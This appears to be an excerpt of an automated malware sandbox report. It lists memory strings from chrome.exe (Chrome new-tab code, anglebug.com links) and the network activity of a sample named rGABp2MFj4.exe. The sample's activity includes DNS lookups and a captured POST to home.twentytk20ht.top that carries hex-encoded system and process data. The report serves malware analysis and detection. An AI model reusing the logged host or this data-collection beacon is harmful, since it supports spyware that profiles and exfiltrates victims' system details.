Source: chrome.exe, 00000003.00000003.1852717229.000053000100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1852101029.000053000037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1853217229.0000530001038000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000003.00000003.1852717229.000053000100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1852101029.000053000037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1853217229.0000530001038000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000003.00000002.1864187292.00005300008C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ht/www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.1867675469.0000530000BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1862984380.000053000066C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000003.1840494327.00005300006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1863081408.00005300006C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.1862984380.000053000066C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/< equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.1867675469.0000530000BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1861306394.00005300001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.1861306394.00005300001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca@e equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.1861306394.00005300001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytcae equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000003.1840494327.00005300006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1863081408.00005300006C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.1867675469.0000530000BB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Q_ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.1878055486.0000530000D4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: httpbin.org
Source: global traffic DNS traffic detected: DNS query: home.twentytk20ht.top
Source: global traffic DNS traffic detected: DNS query: twentytk20ht.top
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: unknown HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 503385Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 39 33 39 36 37 39 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: rGABp2MFj4.exe, 00000000.00000003.1430394070.00000000078A0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.css
Source: rGABp2MFj4.exe, 00000000.00000003.1430394070.00000000078A0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.jpg
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000003.00000002.1867675469.0000530000BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000003.00000002.1862117875.000053000040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1862922030.000053000062C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 00000003.00000002.1863523014.0000530000738000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1862357291.00005300004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1862922030.000053000062C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 00000003.00000002.1863022473.0000530000690000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1862922030.000053000062C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3586
Source: chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3623
Source: chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3624
Source: chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 00000003.00000002.1878055486.0000530000D4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3625Vulkan
Source: chrome.exe, 00000003.00000002.1862357291.00005300004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 00000003.00000002.1862357291.00005300004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 00000003.00000002.1862357291.00005300004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 00000003.00000002.1863463318.0000530000700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1863022473.0000530000690000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3970
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3970)
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4324
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 00000003.00000002.1862357291.00005300004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4405
Source: chrome.exe, 00000003.00000002.1867675469.0000530000BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4428
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1862357291.00005300004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4551
Source: chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1862922030.000053000062C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4633
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4722
Source: chrome.exe, 00000003.00000002.1863463318.0000530000700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1862357291.00005300004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4836
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4901
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4937
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5007
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5007J
Source: chrome.exe, 00000003.00000002.1862357291.00005300004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5055
Source: chrome.exe, 00000003.00000002.1859446738.0000530000014000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5061
Source: chrome.exe, 00000003.00000002.1862357291.00005300004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5281
Source: chrome.exe, 00000003.00000002.1862357291.00005300004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5371
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5375
Source: chrome.exe, 00000003.00000002.1863022473.0000530000690000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5421
Source: chrome.exe, 00000003.00000002.1862357291.00005300004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5430
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5535
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5658
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5750
Source: chrome.exe, 00000003.00000002.1868162459.0000530000C1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5750~
Source: chrome.exe, 00000003.00000002.1859446738.0000530000014000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1862357291.00005300004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5881
Source: chrome.exe, 00000003.00000003.1850578969.0000530000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1850548670.000053000037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1862922030.000053000062C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5901
